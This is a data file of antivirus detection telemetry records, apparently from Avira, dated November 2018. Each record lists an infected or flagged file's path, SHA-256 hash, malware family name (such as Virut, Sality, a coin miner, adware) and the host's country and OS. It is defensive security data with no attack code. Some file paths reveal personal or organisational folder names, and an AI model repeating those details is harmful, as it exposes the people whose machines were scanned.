  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d9952fadc5c646678a30a6b3c3afee30a38890a7c80f1e5dede1cf834b605991', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T13:32:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d9952fadc5c646678a30a6b3c3afee30a38890a7c80f1e5dede1cf834b605991', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T14:26:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zoo.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Microsoft Games\\Zoo Tycoon\\zoo.exe', filesize=2560000, name='W32/Expiro.N.#M1.#R1'), hash='da0c950715f7d324c4017287b006d30d1739fe6e54a6243266f93c02c31e440d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:09:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='da343c443d011a73dc594be01e6d555d8fde1fd2eadfba27a47855aa339522d9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DA343C443D011A73DC594BE01E6D555D8FDE1FD2EADFBA27A47855AA339522D9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='da343c443d011a73dc594be01e6d555d8fde1fd2eadfba27a47855aa339522d9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:01:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patch.exe', filepath='D:\\برامج -2018\\patch.exe', filesize=64000, name='TR/Tiggre.sphdl.#M1.#R1'), hash='dad81d314a1ebcb6d074c930471dab73140dfd91b69335f0dc9c27027f70e8ab', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T10:04:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='9b69fb9ce712f551146ff4092a91399d9b03a0bd', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\9b69fb9ce712f551146ff4092a91399d9b03a0bd', filesize=2304000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='dae2deecbabe2cad5d201d5649610349810d7d6baa1b27da70abce3fa22d6139', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:30:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-04_14-01-20\\msiexec64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='db4a5b29d52096cc2cb145cdeb802389c5c91d31d49602f37914095d4a5b4237', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe420_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe420 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T09:09:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140250-f2842ae7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140250-F2842AE7', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='db4a5b29d52096cc2cb145cdeb802389c5c91d31d49602f37914095d4a5b4237', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='07050b38-1064-4757-a89c-fb7383a998f7-2.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Apps Hat\\07050b38-1064-4757-a89c-fb7383a998f7-2.exe', filesize=900000, name='ADWARE/CrossRider.Gen.#M300.#R5892'), hash='db5c2a04813e3ff00413d86b105c2096437491ad313bffdb0bbcadc0323e2c20', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='db96342ffa58d091c3392b128b81806bf029da4ae8acca521f5a091fec682a85', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\DB96342FFA58D091C3392B128B81806BF029DA4AE8ACCA521F5A091FEC682A85', filesize=1856000, name='TR/Crypt.ZPACK.Gen.#M300.#R3881'), hash='db96342ffa58d091c3392b128b81806bf029da4ae8acca521f5a091fec682a85', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:05:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210318-a99908f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5eeaa1a7\\AVSCAN-20181104-210102-9079F3F1\\AVSCAN-20181104-210318-A99908F3', filesize=8484000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='dbd63ed5cbbf2133c2acc4c8d07ca6dfc3af4c049a08be1886ec9c9f9c988fad', metadata=Row(cmdline=None, country='AL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:04:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xocr32b.exe', filepath='C:\\Program Files (x86)\\Sharp\\Sharpdesk\\XOCR32B.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='dc650ca8ee0ebfc411d42c34f29d868dfcb6cf2a591b9feb71920e7312c55483', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:rsUe4FcwdUKb06K7.1', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T01:22:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161317-5f24636c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-161317-5F24636C', filesize=512000, name='ADWARE/Taranis.3958.#M1.#R1'), hash='dcae30c8c3eba52071f63a022d70808bbd48d73dd5f12cfde5d8b0b4f90bebbd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:43:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-122016-d7d1c081', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2119317d\\AVSCAN-20181104-120757-821055D9\\AVSCAN-20181104-122016-D7D1C081', filesize=896000, name='ADWARE/CrossRider.Gen2.#M1.#R1'), hash='dd4b79eb1c4ad1d7709b81a9f439313c60ee4d83a9cda7ccfaaa0fc5d984457c', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:20:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cw1371a0.exe', filepath='d:\\برامج\\dell\\dall win 32\\CW1371A0.exe', filesize=4340000, name='W32/Neshta.A.#M1.#R1'), hash='dd4ffd33bef46a0b0aabb8ecf34fefa6b87a9023f60a8c31d998aa89f4ea8e25', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:46:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dfserv.exe', filepath='C:\\Program Files (x86)\\Faronics\\Deep Freeze\\Install C-0\\DFServ.exe', filesize=2112000, name='TR/Crypt.XPACK.Gen.#M300.#R4032'), hash='dd69199040d742d157694ea777536d9dc3396365fb06cdac97c76312da89a83f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:01:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~se1426.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~se1426.tmp', filesize=832000, name='HEUR/AGEN.1025634.#M1.#R1'), hash='dda8bafe207bea21c09b3b1ce76532914eeaca1e7750148a0e92bafba556a4da', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:52:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-223323-90bb807c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5bb6a51\\AVSCAN-20181104-222729-4CD45D0B\\AVSCAN-20181104-223323-90BB807C', filesize=704000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='de097ac894119793c04d5623006b50724947491431a1f0234624afcce606d15f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:33:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='C:\\Windows\\System32\\dccw.exe', filesize=896000, name='W32/Virut.Gen.#M1.#R1'), hash='de8f5b055b95c51ceb5210b1c4f8bb6b6e6fdf2978072b4659ec0e21ea05b217', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:07:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='w_cproc_p_11.1.048_redist_intel64.exe', filepath='D:\\PLAQUINHAS DIVERTIDAS\\PROGRAMAS\\COREL X8\\CorelDraw Graphics Suite X8 Multilanguage 32 e 64 Bits\\CorelDRAW X8 32 e 64\\x64\\MSIs\\w_cproc_p_11.1.048_redist_intel64.exe', filesize=512000, name='W32/Stanit.#M1.#R1'), hash='debe1faa480cfe3729607fcfd0648df36b4a96ae658dc0865a0b7b0beac73db7', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:28:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lio first outline.doc', filepath='LIO First Outline.doc', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:30:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='object', filepath='object', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:45:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='object', filepath='object', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:41:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lio first outline.doc', filepath='LIO First Outline.doc', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:32:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lio first outline.doc', filepath='LIO First Outline.doc', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:19:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lio first outline.doc', filepath='LIO First Outline.doc', filesize=128000, name='W97M/MARKER.HR.#M0.#R0'), hash='decedc11251f76eddcf2981d4c53907de35d53a7c84d3c1a096af5f72241d416', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:16:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='systembooster_x64.dll', filepath='\\\\?\\C:\\ProgramData\\System Booster\\SystemBooster_x64.dll', filesize=4160000, name='TR/BProtector.Gen.#M300.#R8258'), hash='deff17bbab195f71a97f63351d79731a246f80eb36820336b52c48cbbf2d3e0e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:02:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='5b99abfe61fb5628cc5f41b481018dc1fd68605c', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\5b99abfe61fb5628cc5f41b481018dc1fd68605c', filesize=5632000, name='W32/Sality.AT.#M1.#R1'), hash='e0ce60953a323c4f0077fd49368b2f25a26fec6c1b678ae8830bde8f779886b4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:09:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='l110_x86_153ushomeexportasiaml_mp.exe', filepath='D:\\RECOVERY UFD PNY\\1 FAT32\\Lost Folders\\DIR291\\L110_x86_153UsHomeExportAsiaML_MP.exe', filesize=21504000, name='W32/Sality.AG.#M1.#R1'), hash='e1444c8782c58589d1a01e7783e5616178eb3a28d12888154b2b18049f1b0371', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:39:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='l110_x86_153ushomeexportasiaml_mp.exe', filepath='\\\\?\\D:\\RECOVERY UFD PNY\\1 FAT32\\Lost Folders\\DIR291\\L110_x86_153UsHomeExportAsiaML_MP.exe', filesize=21504000, name='W32/Sality.AG.#M1.#R1'), hash='e1444c8782c58589d1a01e7783e5616178eb3a28d12888154b2b18049f1b0371', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:08:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e19b7f540ff4e9322d4e4e5c469083e1849e78ffe8c0179101b778e1c216a9bf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T14:33:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='e19b7f540ff4e9322d4e4e5c469083e1849e78ffe8c0179101b778e1c216a9bf', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:32:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-124735-a7dbe6f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_112b9ab9\\AVSCAN-20181104-122007-0EB1DF05\\AVSCAN-20181104-124735-A7DBE6F4', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='e1f89e255d1369348e284053014b9cd2c1b3b77e5cb6078e81e5c1849f550c87', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:48:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ocs_v71b.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\OCS\\ocs_v71b.exe', filesize=320000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='e1f89e255d1369348e284053014b9cd2c1b3b77e5cb6078e81e5c1849f550c87', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:20:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-160511-9bd5ffbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b86276e2\\AVSCAN-20181103-124328-1505CFF1\\AVSCAN-20181104-160511-9BD5FFBD', filesize=832000, name='ADWARE/ConvertAd.Gen7.#M1.#R1'), hash='e1f9e2ddf2d95ce794c3dcf3f65443726d9cb1cc78d0b2f3fc524da65c074ef3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:05:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152305-5d5440d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b86276e2\\AVSCAN-20181103-124328-1505CFF1\\AVSCAN-20181104-152305-5D5440D2', filesize=832000, name='ADWARE/ConvertAd.Gen7.#M1.#R1'), hash='e1f9e2ddf2d95ce794c3dcf3f65443726d9cb1cc78d0b2f3fc524da65c074ef3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:23:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e26dadab0222b19d7fda1be7a0f3401f7ca30cec62ae94127f99eb46b52aa5d4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E26DADAB0222B19D7FDA1BE7A0F3401F7CA30CEC62AE94127F99EB46B52AA5D4', filesize=32000, name='TR/Crypt.XPACK.Gen7.#M300.#R601411'), hash='e26dadab0222b19d7fda1be7a0f3401f7ca30cec62ae94127f99eb46b52aa5d4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:32:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=18000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e299bc512258f8496a0867e74bff9824a62157eaa370319a974a11a90412fb59', metadata=Row(cmdline=None, country='FI', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T18:55:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e2dd52bf80724e44332a5583ee930b228c00f50b77b25ae92b6623c8f14494f4', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\E2DD52BF80724E44332A5583EE930B228C00F50B77B25AE92B6623C8F14494F4', filesize=960000, name='ADWARE/iBryte.Gen7.#M300.#R600467'), hash='e2dd52bf80724e44332a5583ee930b228c00f50b77b25ae92b6623c8f14494f4', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:22:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e39a45bd02dddde6e513e3570d59fb25560d8c311824d3694758ed30b35555af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E39A45BD02DDDDE6E513E3570D59FB25560D8C311824D3694758ED30B35555AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e39a45bd02dddde6e513e3570d59fb25560d8c311824d3694758ed30b35555af', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T09:50:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='smass.exe', filepath='\\?\\C:\\Documents and Settings\\X\\Application Data\\Microsoft\\Windows\\WindowsAccManager\\smass.exe', filesize=128000, name='HEUR/AGEN.1029516.#M1.#R1'), hash='e5078a9da00d833ce1d6b197c97b64a623ec8a2c291217bff785e5584f65b4c2', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:33:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cost values1999.xls', filepath='D:\\Files\\arsiv\\old_users\\handeg\\BELGELER\\Şirket Belgeleri\\YALOVA DOCS\\EXCEL FILES\\BUDGET\\Budget Docs\\cost values1999.xls', filesize=64000, name='X97M/Laroux.FK.#M1.#R1'), hash='e50f6cbff7f7ddcc04993c1e5b4d334406e741b86c98d6e21fa097720c88355c', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:13:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e5a603ccac1f21a133ee0f5faa65cf59c12575608b0d3caa0de109e49649cce3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T10:08:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e5a603ccac1f21a133ee0f5faa65cf59c12575608b0d3caa0de109e49649cce3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='e5a603ccac1f21a133ee0f5faa65cf59c12575608b0d3caa0de109e49649cce3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:10:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e5d8d1a9160e02fb53037ef3024f7cf75c43b62a5dccac6b64a242b8e2c4b790', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E5D8D1A9160E02FB53037EF3024F7CF75C43B62A5DCCAC6B64A242B8E2C4B790', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e5d8d1a9160e02fb53037ef3024f7cf75c43b62a5dccac6b64a242b8e2c4b790', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:40:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='117682-renault-clio-3-gtasa.exe', filepath='C:\\Users\\X\\Desktop\\транспорт для GTA SA\\машины\\117682-renault-clio-3-gtasa.exe', filesize=15684000, name='PUA/GameModding.Gen.#M300.#R6944'), hash='e64700b002769bf2307dae4ac792df097cdc62c658a3416a0981d8fac43b2ab8', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T22:49:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e69d066f2cd3336846a2fb31e3ad342c0c4e1960ede10407e064706a3d545c05', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\E69D066F2CD3336846A2FB31E3AD342C0C4E1960EDE10407E064706A3D545C05', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e69d066f2cd3336846a2fb31e3ad342c0c4e1960ede10407e064706a3d545c05', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T10:59:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00008cc5', filepath='C:\\Windows\\Temp\\c27db646-c3b1-476c-983e-74a922691aa7\\tmp000003cf\\tmp00008cc5', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='e6b2f1fdc0f7fef18276621a4332f2c3afd33a42fd520bfe55fd3e8438f3d95c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.930.11587\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T16:48:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174816-3b71fc5f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ac94082d\\AVSCAN-20181104-174721-33709828\\AVSCAN-20181104-174816-3B71FC5F', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='e733cf022d278b3e4597142d9acba4dade4653d8b5cdd3d6b3e1860f30789812', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:48:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sfml_template.exe', filepath='C:\\Users\\X\\Desktop\\SFML\\SFML_TEMPLATE\\x64\\Debug\\SFML_TEMPLATE.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='e733cf022d278b3e4597142d9acba4dade4653d8b5cdd3d6b3e1860f30789812', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\Common7\\IDE\\Remote Debugger\\x64\\msvsmon.exe', parentsize=4840568, timestamp='2018-11-04T09:46:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fscapturesetup84.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FSCaptureSetup84.exe', filesize=10588000, name='HEUR/AGEN.1017487.#M1.#R1'), hash='e74f5c53d3dca7e814fa2344f45e9ce46e13d15a821ac49f64d8901363f8aa6a', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:19:23Z'), dt=datetime.date(2018, 11, 4)),
